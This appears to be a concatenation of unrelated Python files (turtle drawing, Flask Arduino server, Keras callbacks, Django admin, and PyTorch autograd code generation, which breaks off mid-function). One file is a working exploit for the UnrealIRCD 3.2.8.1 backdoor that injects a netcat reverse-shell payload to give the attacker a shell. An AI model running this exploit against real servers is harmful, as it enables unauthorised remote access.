spider.circle(20) ## Create a spider body
leg_number = 6
leg_length = 70
leg_pos = 380 / leg_number
spider.pensize(5) ## Configure spider legs
n = 0
while (n < leg_number): ##Draw legs
spider.goto(0,0)
spider.setheading(leg_pos*n)
spider.forward(leg_length)
n = n + 1
spider.hideturtle()
wn = trtl.Screen()
wn.mainloop()
|
# ------------------------------------------------------------------------------
# name : api_server.py
# author : Noe Flatreaud (Retr0)
# description:
#   a simple API server for the IHC-controller project.
#   it provides an API URL as well as a basic dashboard, so you can
#   use it anywhere from a web browser.
#   you can also create a third-party app and use the API URL directly.
# ------------------------------------------------------------------------------
import serial
import threading
import time
from flask import *
app = Flask(__name__)
# ------------------------------------------------------------------------------
# Arduino Serial
# ------------------------------------------------------------------------------
arduino = serial.Serial(port='COM4', baudrate=9600, timeout=.1)
#def write_read(x):
# arduino.write(bytes(x, 'utf-8'))
# time.sleep(0.05)
# data = arduino.readline()
# return data
# ------------------------------------------------------------------------------
# Routes
# ------------------------------------------------------------------------------
# default route
@app.route('/')
def index():
return render_template('index.html')
# API route
@app.route('/api', methods=['GET'])
def api():
try:
        output = int(request.args['output'])
        value = int(request.args['value'])
print(bytes([output, value]))
except Exception as e:
data = "Oops Something went wrong !!<br> {0}".format(str(e))
return data, 413 # HTTP_413_REQUEST_ENTITY_TOO_LARGE
else:
data = "OK"
        arduino.write(bytes([output, value]))
return data, 200 # HTTP_200_OK
# allow javascript index.js to be imported !
@app.route('/index.js')
def js():
return render_template('index.js')
def io_thread():
print("Started new Daemon")
while 1:
time.sleep(1)
#print("slept");
# ------------------------------------------------------------------------------
# Main
# ------------------------------------------------------------------------------
if __name__ == "__main__":
io = threading.Thread(target = io_thread, daemon = True)
    io.start()
# run flask server
app.run(host='0.0.0.0')
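# A minimal usage sketch (assumption): with the server running on Flask's
# default port 5000, a request such as
#   curl "http://localhost:5000/api?output=3&value=1"
# makes the handler write bytes([3, 1]) to the Arduino serial port and return "OK".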
|
import time
from datetime import timedelta
import numpy as np
from pytimeparse.timeparse import timeparse
from tensorflow import keras
from tensorflow import logging
from .save_and_load import save_model, save_last_epoch_number, save_best_info
class ModelSaver(keras.callbacks.Callback):
def __init__(self, model_name, period=1, verbose=0):
super().__init__()
if not isinstance(period, int):
raise TypeError('period should be int.')
if period <= 0:
raise ValueError('period should be at least 1.')
self.model_name = model_name
self.period = period
self.verbose = verbose
self.epochs_since_last_save = 0
def on_train_begin(self, logs=None):
# Allow instances to be re-used
self.epochs_since_last_save = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs_since_last_save += 1
if self.epochs_since_last_save >= self.period:
self.epochs_since_last_save = 0
save_model(model_name=self.model_name, model=self.model, epoch=epoch,
does_overwrite=True, does_include_optimizer=True)
if self.verbose > 0:
print('Epoch %d: save the model "%s" successfully.' % (epoch + 1, self.model_name))
class EpochNumberSaver(keras.callbacks.Callback):
def __init__(self, model_name, verbose=0):
super().__init__()
self.model_name = model_name
self.verbose = verbose
def on_epoch_end(self, epoch, logs=None):
save_last_epoch_number(model_name=self.model_name, epoch=epoch)
if self.verbose > 0:
print('Epoch %d: save the epoch number successfully.' % (epoch + 1))
class BestInfoSaver(keras.callbacks.Callback):
def __init__(self, model_name, monitor='loss', mode='min', baseline=None, verbose=0):
super().__init__()
self.model_name = model_name
self.monitor = monitor
self.baseline = baseline
self.verbose = verbose
if mode is not None:
mode = mode.lower()
if mode not in ['min', 'max']:
logging.warning('BestInfoSaver mode %s is unknown, fallback to min mode.', mode)
mode = 'min'
if mode == 'min':
self.monitor_op = np.less
else:
self.monitor_op = np.greater
self.best = None
def on_train_begin(self, logs=None):
# Allow instances to be re-used
if self.baseline is not None:
self.best = self.baseline
else:
self.best = np.Inf
if self.monitor_op != np.less:
self.best = -self.best
def on_epoch_end(self, epoch, logs=None):
current = logs.get(self.monitor)
if current is None:
logging.warning('BestInfoSaver conditioned on metric `%s` '
'which is not available. Available metrics are: %s',
self.monitor, ','.join(list(logs.keys())))
return
if self.monitor_op(current, self.best):
self.best = current
save_best_info(model_name=self.model_name, epoch=epoch, monitor_name=self.monitor, monitor_value=self.best)
if self.verbose > 0:
print('Epoch %d: save best info successfully.' % (epoch + 1))
elif self.verbose > 0:
print('Epoch %d: %s did NOT improve from %s' % (epoch + 1, self.monitor, self.best))
class TimeLimiter(keras.callbacks.Callback):
def __init__(self, limit, verbose=0):
super().__init__()
if limit is None:
raise ValueError('TimeLimiter: limit cannot be None.')
self.limit = limit
self.verbose = verbose
self.train_begin_time = 0.
self.epoch_begin_time = 0.
self.epoch_avg_seconds = 0.
self.epoch_count = 0
self.stopped_epoch = 0
self.__parse_limit()
def on_train_begin(self, logs=None):
self.train_begin_time = time.time()
# Allow instances to be re-used
self.epoch_avg_seconds = 0.
self.epoch_count = 0
self.stopped_epoch = 0
def on_epoch_begin(self, epoch, logs=None):
self.epoch_begin_time = time.time()
def on_epoch_end(self, epoch, logs=None):
now = time.time()
epoch_seconds = now - self.epoch_begin_time
self.epoch_avg_seconds = (self.epoch_avg_seconds * self.epoch_count + epoch_seconds) / (self.epoch_count + 1)
self.epoch_count += 1
if now - self.train_begin_time + self.epoch_avg_seconds > self.limit:
self.stopped_epoch = epoch
self.model.stop_training = True
def on_train_end(self, logs=None):
if self.stopped_epoch > 0 and self.verbose > 0:
now = time.time()
et_seconds = now - self.train_begin_time
et = timedelta(seconds=et_seconds)
next_epoch_eta = timedelta(seconds=self.epoch_avg_seconds)
tlr = timedelta(seconds=self.limit - et_seconds)
print('Epoch %d: stop by time limiter. '
'Elapsed time: %s, Next epoch ETA: %s, Time limit remaining: %s.' % (
self.stopped_epoch + 1, et, next_epoch_eta, tlr))
def __parse_limit(self):
if isinstance(self.limit, str):
try:
self.limit = float(self.limit)
self.limit *= 60.
except ValueError:
self.limit = timeparse(self.limit)
elif isinstance(self.limit, timedelta):
self.limit = self.limit.total_seconds()
if self.limit is None:
raise ValueError('TimeLimiter: cannot parse limit.')
if not isinstance(self.limit, float):
self.limit = float(self.limit)
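# A small sketch of how __parse_limit normalises the limit argument (assumption,
# not part of the original module): TimeLimiter(limit='90') stores 90 * 60 = 5400.0
# seconds (bare numbers and numeric strings are read as minutes),
# TimeLimiter(limit=timedelta(hours=2)) stores 7200.0, and a pytimeparse string
# such as '1h30m' also ends up as 5400.0 seconds.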
|
from typing import List
class Solution:
def maximumGap(self, nums: List[int]) -> int:
nums.sort()
a=0
b=nums[0]
for x in range(1,len(nums)):
if nums[x]-b>a:
a=nums[x]-b
b=nums[x]
return a
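# A minimal usage sketch (assumption: run outside the LeetCode harness).
# [3, 6, 9, 1] sorts to [1, 3, 6, 9]; the largest gap between successive
# elements is 3.
if __name__ == "__main__":
    assert Solution().maximumGap([3, 6, 9, 1]) == 3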
|
# -*- encoding: utf-8 -*-
"""
@File : settings.py
@Time : 2020/12/20 23:34
@Author : chise
@Email : chise123@live.com
@Software: PyCharm
@info :
"""
import os
from . import global_settings
FASTAPI_VARIABLE = "FASTAPI_SETTINGS_MODULE"
import importlib
class Settings:
def __init__(self):
settings_module = os.environ.get(FASTAPI_VARIABLE)
if not settings_module:
work_path = os.getcwd()
path_list = os.path.split(work_path)
if not os.path.isfile(
os.path.join('src', "settings.py")
):
raise ImportError(
"未找到settings.py"
f"你必须设置环境变量{FASTAPI_VARIABLE}=你的settings.py的位置"
"或存在src/settings.py"
)
else:
settings_module = "src.settings"
for setting in dir(global_settings):
if setting.isupper():
setattr(self, setting, getattr(global_settings, setting))
self.SETTINGS_MODULE = settings_module
mod = importlib.import_module(self.SETTINGS_MODULE)
for setting in dir(mod):
if setting.isupper():
setting_value = getattr(mod, setting)
setattr(self, setting, setting_value)
if not getattr(self, "SECRET_KEY"):
raise AttributeError("SECRET_KEY不能为空")
settings = Settings()
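# A minimal usage sketch (assumption, outside this module): point the loader at
# your settings module before this file is imported, e.g.
#   os.environ["FASTAPI_SETTINGS_MODULE"] = "src.settings"
# then import the `settings` instance from this module and read values such as
# settings.SECRET_KEY.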
|
from msf.lib.exploit import Exploit, Revshell
import socket
import time
class Unrealircd(Exploit):
# constructor
def __init__(self):
super().__init__('UnrealIRCD', 'UnrealIRCD 3.2.8.1 exploit')
# check args
def check(self, target, port=6667):
super().check(target, port)
print('[!] Check not implemented for this exploit.')
# exploit
def exploit(self, target, port=6667, revshell_ip=None, revshell_port=None):
payload = Revshell.build_generic_nc_payload(revshell_ip, revshell_port)
conn = Exploit.init_tcp_conn(target, port)
if not conn:
return False
# wait for connection to initialize
time.sleep(3)
banner = Exploit.get_banner(conn)
# start revshell thread
revshell = Revshell(revshell_ip, revshell_port)
revshell.start()
if Unrealircd.inject_payload(conn, payload):
print('[+] Exploit successful!')
success = True
else:
print('[!] ERROR: Did not gain shell. Exploit failed.')
success = False
# clean up
print('[!] Closing connections to server.')
conn.close()
print('[!] Exploit complete.')
if success:
# we need to wait a while
print('[!] Sleeping for 30 seconds. In that time we should receive a reverse shell. If not, just wait longer!')
time.sleep(30)
return revshell
revshell.terminate()
return success
# Inject a payload into the vulnerable connection.
@staticmethod
def inject_payload(conn, payload):
print('[!] Injecting and running payload.')
# send a simple reverse shell from the exploited server to the attacking host
sent_bytes = conn.send('AB; nohup {} >/dev/null 2>&1\n'.format(payload).encode())
return True
|
import pytest
from math import isclose
from quantities import length
def test_non_SI_unit():
l = length.Length(32)
l1 = l.to_unit(length.foot)
l2 = l.to_unit(length.LengthType.inch)
l3 = l.to_unit(length.LengthType.yard)
l4 = l.to_unit(length.LengthType.mile)
l5 = l.to_unit(length.LengthType.astronomical_unit)
assert isclose(l1.value, 32 * 100 / 2.54 / 12)
assert l1.current_unit == length.foot
assert isclose(l2.value, 32 * 100 / 2.54)
assert l2.current_unit == length.inch
assert isclose(l3.value, 32 * 1.0936)
assert l3.current_unit == length.yard
assert isclose(l4.value, 32 / 1609.34)
assert l4.current_unit == length.mile
assert isclose(l5.value, 32 / 149597870700)
assert l5.current_unit == length.astronomical_unit
|
from django.contrib import admin
from django_jalali.admin.filters import JDateFieldListFilter
import django_jalali.admin as jadmin
from . import models
# Register your models here.
# You need to import this to add the jalali calendar widget
class DefenseTimeAdmin(admin.ModelAdmin):
list_filter = (
('occurrence_date', JDateFieldListFilter),
)
# admin.site.index_template = 'admin2/index.html'
# admin.site.login_template = 'admin2/login.html'
# admin.site.logout_template=''
# admin.site.password_change_done_template=''
# admin.site.password_change_template=''
# admin.site.app_index_template = 'admin2/app_index.html'
admin.site.register(models.DefenseTime, DefenseTimeAdmin)
#admin.site.register(BarTime, BarTimeAdmin)
admin.site.register(models.Semester)
admin.site.register(models.DefensePlace)
#admin.site.register(models.DefenseTime)
admin.site.register(models.Major)
admin.site.register(models.Student)
admin.site.register(models.ReservationRequest)
admin.site.register(models.DefenseSession)
admin.site.register(models.Professor)
admin.site.site_header = 'پنل مدیریت سامانهی برنامهریزی اتاق دفاع'
admin.site.site_title = 'پنل مدیریت سامانهی برنامهریزی اتاق دفاع'
admin.site.index_title = 'داشبورد مدیریت'
|
from rdflib import Graph, plugin
from rdflib.serializer import Serializer
op = ""
while(True):
try:
testrdf = input()
except:
break
g = Graph().parse(data=testrdf, format='n3')
op+= str(g.serialize(format='json-ld', indent=1)) +'\n'
print(op)
|
# Generates VariableType.h/cpp
#
# VariableType is a subclass of at::Type that provides the binding code
# necessary to provide a differentiable version of ATen operators. There are a
# number of different things we could mean:
#
# - Given a non-differentiable forward implementation, we might
# directly associate it with a backward implementation to make
# it differentiable. This is the common case.
#
# - Some functions don't need a backwards implementation, because
# backpropagation will never propagate beyond them. There are a
# number of different reasons why this may be the case:
#
# - The function has no differentiable inputs
# - The function's output is not differentiable
# - The function has no data dependency on its input
#
# - Some functions don't need a backwards implementation because they
# are implemented as a composition of other (differentiable) ATen
# functions. These are dispatched directly to the Type superclass,
# which will in turn dispatch back to VariableType for its
# differentiable subcomponents.
#
from __future__ import print_function
from .utils import CodeTemplate, nested_dict, write, uninplace_api_name
from .gen_autograd import VIEW_FUNCTIONS
from .gen_autograd_functions import uses_single_grad
# These functions are written manually in templates/VariableType.cpp
MANUAL_IMPLEMENTATIONS = {
'resize_', 'resize_as_', 'detach', 'detach_', 'copy_'
}
# These functions we don't want to record for tracing, because we always want
# to trace their constituent parts. This is a temporary hack in lieu
# of proper scopes, where subsequent compilation passes can ask for the unfolding
# on demand. Only concrete ATen methods can be disabled this way; it will have
# NO EFFECT otherwise.
DONT_RECORD_TRACE = {
'convolution', 'conv1d', 'conv2d', 'conv3d', 'conv_transpose1d',
'conv_transpose2d', 'conv_transpose3d', 'lstm_cell', 'gru_cell',
'rnn_tanh_cell', 'rnn_relu_cell', 'linear',
# FIXME: figure out a better way when we support sparse tensors in jit
'_coalesced_',
}
# When traced, these functions are recorded under a renamed op name:
RENAME_TRACE = {
'zero': 'zeros_like',
'fill': 'full_like',
}
# (declaration name, argument name) -> attribute name
RENAME_ATTRIBUTES = {
('fill_', 'value'): 'fill_value'
}
# These functions are not worth profiling because they are very cheap and may
# be called very often.
DONT_PROFILE = {
'data_ptr', 'get_device', 'is_contiguous', 'is_cuda', 'is_distributed',
'is_same_size', 'is_set_to', 'is_signed', 'is_sparse', 'numel',
'size', 'storage_offset', 'stride',
}
# We don't set or modify grad_fn on these methods. Generally, they return
# tensors that have requires_grad=False. In-place functions listed here will
# not examine or modify requires_grad or grad_fn.
DONT_REQUIRE_DERIVATIVE = {
# These only depend on the input Tensor's shape and device, not the data
'ones_like', 'zeros_like', 'rand_like', 'randn_like',
# These are only implemented on integral types
'__and__', '__iand__', '__ilshift__', '__ior__', '__irshift__', '__ixor__',
'__lshift__', '__or__', '__rshift__', '__xor__',
# These work on integral data types, and hence don't require derivative
'_sobol_engine_draw', '_sobol_engine_ff', '_sobol_engine_scramble_',
'_sobol_engine_initialize_state_',
# This is an unsafe method that is meant to be out of reach of autograd.
'_coalesced_',
}
# NOTE [ Invariant: TensorImpl and Storage Pointer Equality ]
#
# When a function modifies its input tensors (via inplace or out-variants),
# it should never change the input tensors' underlying c10::TensorImpl pointers
# or c10::Storage pointers.
#
# The following code templates implement the checks for this invariant:
SAVE_TENSOR_STORAGE = CodeTemplate("""\
c10::optional<Storage> ${tensor_name}_storage_saved =
${tensor_name}.has_storage() ? c10::optional<Storage>(${tensor_name}.storage()) : c10::nullopt;
""")
ENFORCE_SAME_TENSOR_STORAGE = CodeTemplate("""\
if (${tensor_name}_storage_saved.has_value())
AT_ASSERT(${tensor_name}_storage_saved.value().is_alias_of(${tensor_name}.storage()));
""")
SAVE_TENSORLIST_STORAGE = CodeTemplate("""\
std::vector<c10::optional<Storage>> ${tensorlist_name}_storage_saved;
${tensorlist_name}_storage_saved.reserve(${tensorlist_name}.size());
for (const Tensor& tensor : ${tensorlist_name})
  ${tensorlist_name}_storage_saved.push_back(
    tensor.has_storage() ? c10::optional<Storage>(tensor.storage()) : c10::nullopt);
""")
ENFORCE_SAME_TENSORLIST_STORAGE = CodeTemplate("""\
for (size_t i=0; i<${tensorlist_name}.size(); i++) {
if (${tensorlist_name}_storage_saved[i].has_value())
AT_ASSERT(${tensorlist_name}_storage_saved[i].value().is_alias_of(${tensorlist_name}[i].storage()));
}
""")
SAVE_TENSOR_IMPL = CodeTemplate("""\
c10::intrusive_ptr<TensorImpl> ${tensor_name}_impl_saved;
if (${tensor_name}.defined()) ${tensor_name}_impl_saved = ${tensor_name}.getIntrusivePtr();
""")
ENFORCE_SAME_TENSOR_IMPL = CodeTemplate("""\
if (${tensor_name}_impl_saved) AT_ASSERT(${tensor_name}_impl_saved == ${tensor_name}.getIntrusivePtr());
""")
SAVE_TENSORLIST_IMPL = CodeTemplate("""\
std::vector<c10::intrusive_ptr<TensorImpl>> ${tensorlist_name}_impl_saved(${tensorlist_name}.size());
for (size_t i=0; i<${tensorlist_name}.size(); i++)
if (${tensorlist_name}[i].defined()) ${tensorlist_name}_impl_saved[i] = ${tensorlist_name}[i].getIntrusivePtr();
""")
ENFORCE_SAME_TENSORLIST_IMPL = CodeTemplate("""\
for (size_t i=0; i<${tensorlist_name}.size(); i++) {
if (${tensorlist_name}_impl_saved[i])
AT_ASSERT(${tensorlist_name}_impl_saved[i] == ${tensorlist_name}[i].getIntrusivePtr());
}
""")
# The following list contains functions that we don't enforce the invariant on.
DONT_ENFORCE_SAME_TENSOR_IMPL_OR_STORAGE = {
# These functions are expected to change impl or storage of input tensors
'_th_set_', '_cudnn_rnn_flatten_weight',
}
# END CHECKS FOR [ Invariant: TensorImpl and Storage Pointer Equality ]
METHOD_DECLARATION = CodeTemplate("""\
${return_type} ${method_prefix_derived}${api_name}(${type_method_formals}) const override;
""")
METHOD_DEFINITION = CodeTemplate("""\
${return_type} VariableType::${method_prefix_derived}${api_name}(${type_method_formals}) const {
${type_definition_body}
}
""")
UNPACK_TENSOR = CodeTemplate("""\
auto${ref} ${arg_name}_ = unpack${suffix}(${arg_name}, "${arg_name}", ${arg_pos});""")
UNPACK_OPTIONS = CodeTemplate("""\
auto ${arg_name}_ = TensorOptions(${arg_name}).is_variable(false);""")
DECLARE_GRAD_FN = CodeTemplate("""\
std::shared_ptr<${op}> grad_fn;
""")
SETUP_DERIVATIVE = CodeTemplate("""\
if (compute_requires_grad( ${args_with_derivatives} )) {
${setup}
}
""")
ASSIGN_GRAD_FN = CodeTemplate("""\
grad_fn = std::shared_ptr<${op}>(new ${op}(${op_ctor}), deleteFunction);
grad_fn->set_next_edges(collect_next_edges( ${args_with_derivatives} ));
""")
CALL_VIA_TYPE = CodeTemplate("""\
TypeDefault::${method_prefix_derived}${api_name}(${type_method_args})""")
CALL_VIA_DERIVED = CodeTemplate("""\
baseType->${method_prefix_derived}${base_name}(${unpacked_args})""")
# If the `baseType` operation has return values, we use the `tmp` variable to hold the
# values temporarily and pass the values to the return variables outside of the
# `at::AutoNonVariableTypeMode` guard block.
DISPATCH_TO_NON_VAR_TYPE_WITH_RETURN_VALUES = CodeTemplate("""\
auto tmp = ([&]() {
at::AutoNonVariableTypeMode non_var_type_mode(true);
return ${base_type_call};
})();
${return_values} = ${rhs_value};
""")
DISPATCH_TO_NON_VAR_TYPE_WITHOUT_RETURN_VALUES = CodeTemplate("""\
{
at::AutoNonVariableTypeMode non_var_type_mode(true);
${base_type_call};
}
""")
SET_HISTORY = CodeTemplate("""\
if (grad_fn) {
${fn}_history(${differentiable_outputs}, grad_fn);
}
""")
CONDITIONAL = CodeTemplate("""\
if (${cond}) {
${statements}
}
""")
RECORD_FUNCTION = CodeTemplate("""\
RECORD_FUNCTION("${name}", std::vector<c10::IValue>({${input_names}}), Function::peek_at_next_sequence_nr());
""")
SELECT = CodeTemplate("""\
if (${cond}) {
${true}
} else {
${false}
}
""")
OP_NAME = CodeTemplate("""\
op_name = jit::Symbol::fromQualString("aten::${trace_name}");
""")
PRE_RECORD_TRACE = CodeTemplate("""\
torch::jit::Node* node = nullptr;
std::shared_ptr<jit::tracer::TracingState> tracer_state;
if (jit::tracer::isTracing()) {
tracer_state = jit::tracer::getTracingState();
at::Symbol op_name;
${set_op_name}
node = tracer_state->graph->create(op_name, /*num_outputs=*/0);
jit::tracer::recordSourceLocation(node);
${add_trace_inputs}
tracer_state->graph->insertNode(node);
${inplace_guard}
jit::tracer::setTracingState(nullptr);
}
""")
INPLACE_GUARD = CodeTemplate("""\
jit::tracer::ensureUniqueIfOutOfPlaced("${name}", ${mutable_input});
""")
ADD_TRACE_INPUT = CodeTemplate("""jit::tracer::addInputs(node, "${name}", ${input});""")
POST_RECORD_TRACE = CodeTemplate("""\
if (tracer_state) {
jit::tracer::setTracingState(std::move(tracer_state));
${add_trace_outputs}
}
""")
RUN_ONLY_IN_DEBUG_MODE = CodeTemplate("""\
#ifndef NDEBUG
${statements}
#endif
""")
FACTORY_FUNCTION_NAMES = None
def find_factory_functions(declarations):
global FACTORY_FUNCTION_NAMES
FACTORY_FUNCTION_NAMES = set()
for declaration in declarations:
if declaration['is_factory_method']:
FACTORY_FUNCTION_NAMES.add(declaration['api_name'])
def should_trace(declaration):
# Operations involving Storage or Type are not traceable at the moment
if any(arg['simple_type'] in {'Storage', 'Type'} for arg in declaration['arguments']):
return False
# We can't trace functions which don't have any Tensor or TensorList returns
if 'Tensor' not in declaration['return_type']:
return False
name = declaration['name']
base_name = name[:-1] if declaration['inplace'] else name[:-4] if name.endswith('_out') else name
if base_name in DONT_RECORD_TRACE or name in DONT_RECORD_TRACE:
return False
return True
def is_out_overload(declaration):
return declaration['api_name'].endswith('_out')
def format_postrecord_trace(declaration):
# For outplacing ops, *_out overloads require special handling to move the
# output *argument* to a return value
if is_out_overload(declaration):
output_names_outplace = [arg['name'] for arg in declaration['arguments'] if arg.get('output', False)]
output_names_inplace = [r['name'] for r in declaration['returns']]
# Code size optimization: the common case is that the return value is
# the same for both variants
if output_names_outplace == output_names_inplace:
outputs = ['jit::tracer::addOutput(node, {});'.format(n) for n in output_names_outplace]
return POST_RECORD_TRACE.substitute(add_trace_outputs=outputs)
local = {}
local['cond'] = 'force_outplace'
local['true'] = ['jit::tracer::addOutput(node, {});'.format(n) for n in output_names_outplace]
local['false'] = ['jit::tracer::addOutput(node, {});'.format(n) for n in output_names_inplace]
selection = SELECT.substitute(local)
return POST_RECORD_TRACE.substitute(add_trace_outputs=selection)
output_names = [r['name'] for r in declaration['returns']]
outputs = ['jit::tracer::addOutput(node, {});'.format(n) for n in output_names]
return POST_RECORD_TRACE.substitute(add_trace_outputs=outputs)
def format_trace_op_name(declaration):
is_inplace = declaration['api_name'] != uninplace_api_name(declaration['api_name'])
if not is_inplace or is_out_overload(declaration):
# special case for *_out functions: the in-place and out-of-place ops
# are overloaded with the same name in the JIT
trace_name = uninplace_api_name(declaration['api_name'])
trace_name = RENAME_TRACE.get(trace_name, trace_name)
return OP_NAME.substitute(trace_name=trace_name)
# otherwise, this is an in-place op and we need to emit both in- and
# out-of-place versions
outplace_trace_name = uninplace_api_name(declaration['api_name'])
inplace_trace_name = declaration['api_name']
outplace_trace_name = RENAME_TRACE.get(outplace_trace_name, outplace_trace_name)
inplace_trace_name = RENAME_TRACE.get(inplace_trace_name, inplace_trace_name)
select_params = {}
select_params['cond'] = 'tracer_state->force_outplace'
select_params['true'] = OP_NAME.substitute(trace_name=outplace_trace_name)
select_params['false'] = OP_NAME.substitute(trace_name=inplace_trace_name)
return SELECT.substitute(select_params)
def format_trace_inputs(declaration):
def dispatch_trace_input(arg_spec):
name, value, simple_type, nullable = arg_spec
        # XXX: For args that have type Tensor?[], the tracer will pass allow_undefined to addInputs
if simple_type == 'TensorList' and nullable:
return '''jit::tracer::addInputs(node, "{}", {}, {});'''.format(name, value, "true")
else:
return ADD_TRACE_INPUT.substitute(name=name, input=value)
trace_inputs = declaration['arguments']
if is_out_overload(declaration):
# *_out functions take the result as a first argument, but they are the
# last argument in the JIT schema.
out_input = trace_inputs[0]
trace_inputs = trace_inputs[1:]
trace_input_spec = [(i['name'], i['name'], i['simple_type'], i.get('is_nullable')) for i in trace_inputs]
trace_inputs = \
'\n'.join(dispatch_trace_input(arg_spec) for arg_spec in trace_input_spec)
if is_out_overload(declaration):
# for *_out functions, handle the result argument differently for inplace/outplace.
        # For inplace: just add the input to the end to conform to the JIT schema
inplace = ADD_TRACE_INPUT.substitute(name=out_input['name'], input=out_input['name'])
# for outplace: do nothing, except if the declaration is a factory.
# Factories are a bit special because their out-of-place overloads
# take an extra TensorOptions argument, which is missing in the _out function
trace_name = uninplace_api_name(declaration['api_name'])
has_factory_name = trace_name in FACTORY_FUNCTION_NAMES
if has_factory_name:
outplace = ADD_TRACE_INPUT.substitute(name='out', input='out.options()')
else:
outplace = ''
trace_inputs += '\n'
trace_inputs += SELECT.substitute(
cond='tracer_state->force_outplace', true=outplace, false=inplace)
return trace_inputs
def format_prerecord_trace(declaration):
local = {}
is_inplace = declaration['api_name'] != uninplace_api_name(declaration['api_name'])
local['set_op_name'] = format_trace_op_name(declaration)
local['add_trace_inputs'] = format_trace_inputs(declaration)
local['inplace_guard'] = ''
if is_inplace:
local['inplace_guard'] = INPLACE_GUARD.substitute(
name=declaration['api_name'],
mutable_input=declaration['arguments'][0]['name'])
return PRE_RECORD_TRACE.substitute(local)
def format_trace(declaration):
return (format_prerecord_trace(declaration), format_postrecord_trace(declaration))
def gen_variable_type(out, aten_declarations, template_path):
"""VariableType.h and VariableType.cpp body
This is the at::Type subclass for differentiable tensors. The
implementation of each function dispatches to the base tensor type to
compute the output. The grad_fn is attached to differentiable functions.
"""
# WARNING: this function call modifies global mutable state
find_factory_functions(aten_declarations)
aten_declarations = list(sorted(aten_declarations, key=lambda decl: decl['name']))
gen_variable_type_shard(out, aten_declarations, template_path, None, True)
# NOTE: see Note [Sharded File] at the top of the VariableType.cpp
# template regarding sharding of the generated files.
num_shards = 5
shards = [[] for _ in range(num_shards)]
# functions are assigned arbitrarily but stably to a file based on hash
for decl in aten_declarations:
x = sum(ord(c) for c in decl['name']) % num_shards
shards[x].append(decl)
for i, shard in enumerate(shards):
gen_variable_type_shard(out, shard, template_path, '_%d' % i, False)
gen_variable_type_shard(out, aten_declarations, template_path, 'Everything', False)
def gen_variable_type_shard(out, aten_declarations, template_path, suffix, header):
VARIABLE_TYPE_H = CodeTemplate.from_file(template_path + '/VariableType.h')
VARIABLE_TYPE_CPP = CodeTemplate.from_file(template_path + '/VariableType.cpp')
type_declarations = []
type_definitions = []
for declaration in aten_declarations:
# Factory methods usually do not appear in `VariableType` at all, since they
# don't dispatch via `Type`; except in the case where the implementation is 'abstract'
# in which case they do!
if declaration['is_factory_method']:
continue
type_declarations.append(METHOD_DECLARATION.substitute(declaration))
if declaration['name'] not in MANUAL_IMPLEMENTATIONS:
type_definitions.append(emit_method_definition(declaration))
env = {
'type_derived_method_declarations': type_declarations,
'type_derived_method_definitions': type_definitions,
}
if header:
write(out, 'VariableType.h', VARIABLE_TYPE_H, env)
else:
write(out, 'VariableType%s.cpp' % suffix, VARIABLE_TYPE_CPP, env)
def emit_method_definition(declaration):
body = emit_body(declaration)
return METHOD_DEFINITION.substitute(declaration, type_definition_body=body)
def emit_body(declaration):
strategy = dispatch_strategy(declaration)
arguments = declaration['arguments']
returns = declaration['returns']
func = declaration['derivative']
name = declaration['name']
inplace = declaration['inplace']
is_out_fn = name.endswith('_out')
modifies_arguments = inplace or is_out_fn
returns_void = len(returns) == 1 and returns[0]['type'] == 'void'
base_name = name[:-1] if inplace else name[:-4] if is_out_fn else name
view_info = VIEW_FUNCTIONS.get(base_name, None)
def is_differentiable(arg):
if 'TensorOptions' in arg['type']:
return False
if 'Tensor' not in arg['type']:
return False
if arg['dynamic_type'] in {'IndexTensor', 'BoolTensor'}:
# These are necessary for legacy code and should be
# used by legacy code only!
assert declaration['mode'] == 'TH' or declaration['mode'] == 'NN', \
"IndexTensor and BoolTensor are restricted to legacy TH/THNN functions only."
return False
if arg['name'] in declaration.get('non_differentiable_arg_names', []):
return False
return True
def find_args_with_derivatives(differentiable_inputs):
"""Find arguments that have derivative definitions"""
if func is None:
return differentiable_inputs
names = set(name for d in func['derivatives'] for name in d['var_names'])
differentiable = [arg for arg in differentiable_inputs if arg['name'] in names]
if len(differentiable) != len(names):
missing = names - set(arg['name'] for arg in differentiable)
raise RuntimeError('Missing arguments for derivatives: {} in {}'.format(missing, func['name']))
return differentiable
inputs = [arg for arg in arguments if not arg.get('output', False)]
differentiable_inputs = list(filter(is_differentiable, inputs))
args_with_derivatives = find_args_with_derivatives(differentiable_inputs)
non_differentiable_arg_names = declaration.get('non_differentiable_arg_names', [])
candidate_differentiable_outputs = list(filter(is_differentiable, returns))
if declaration['output_differentiability'] is not None:
differentiable_outputs = []
output_differentiability = declaration['output_differentiability']
for differentiable, output in zip(output_differentiability, returns):
if differentiable:
differentiable_outputs.append(output)
elif uses_single_grad(func):
differentiable_outputs = candidate_differentiable_outputs[:1]
else:
differentiable_outputs = candidate_differentiable_outputs
requires_derivative = (
base_name not in DONT_REQUIRE_DERIVATIVE and name not in DONT_REQUIRE_DERIVATIVE and
len(differentiable_inputs) > 0 and len(differentiable_outputs) > 0 and
strategy == 'use_derived')
if func is not None and not requires_derivative:
raise RuntimeError('ERROR: derivative ignored for {} -- specified an autograd function without derivative'
.format(name))
def emit_save_inputs():
setup = []
if func is None:
return setup
has_tensorlist_arg = any(arg['type'] == 'TensorList' for arg in func['args_with_derivatives'])
# We don't want to save tensors if we know that they will never be used
# when computing the derivative, so we add guards to those statements
def guard_for(arg):
# It's hard to determine the edge offset if we have TensorLists
if has_tensorlist_arg:
return None
# Empirical evaluation of the cases where we insert those guards in
            # backward shows that they are somewhat useless. E.g. there's no need
# to guard on some values captured from forward, because they had to
# require_grad if the backward function even gets executed. I don't
# have any good ideas for detecting those cases, so I simply disabled the
# checks.
if 'backward' in func['name']:
return None
# If there's a single derivative we could compute, we already have
# a requires_grad check that is sufficient
if len(func['args_with_derivatives']) <= 1:
return None
# We really only care about trimming down the amount of tensors we save
if arg['type'] != 'Tensor':
return None
# We want to emit simple guards, so we only allow that if checking one
# input is enough to determine whether we need that value
used_in = [d for d in func['derivatives'] if arg in d['saved_inputs']]
assert len(used_in) > 0
if len(used_in) != 1:
return None
derivative = used_in[0]
if len(derivative['var_names']) != 1:
return None
derivative_var_name = derivative['var_names'][0]
# Figure out the offset of the edge that uses this variable
for edge_off, arg in enumerate(func['args_with_derivatives']):
if arg['name'] == derivative_var_name:
break
else:
assert False
return 'grad_fn->should_compute_output({})'.format(edge_off)
setup.extend(save_variables(func['saved_inputs'], False, guard_for))
for arg in func['args_with_derivatives']:
if arg['type'] == 'TensorList':
setup.append("grad_fn->{}_size_ = {}.size();".format(arg['name'], arg['name']))
return setup
def setup_derivative(differentiable_inputs):
env = {}
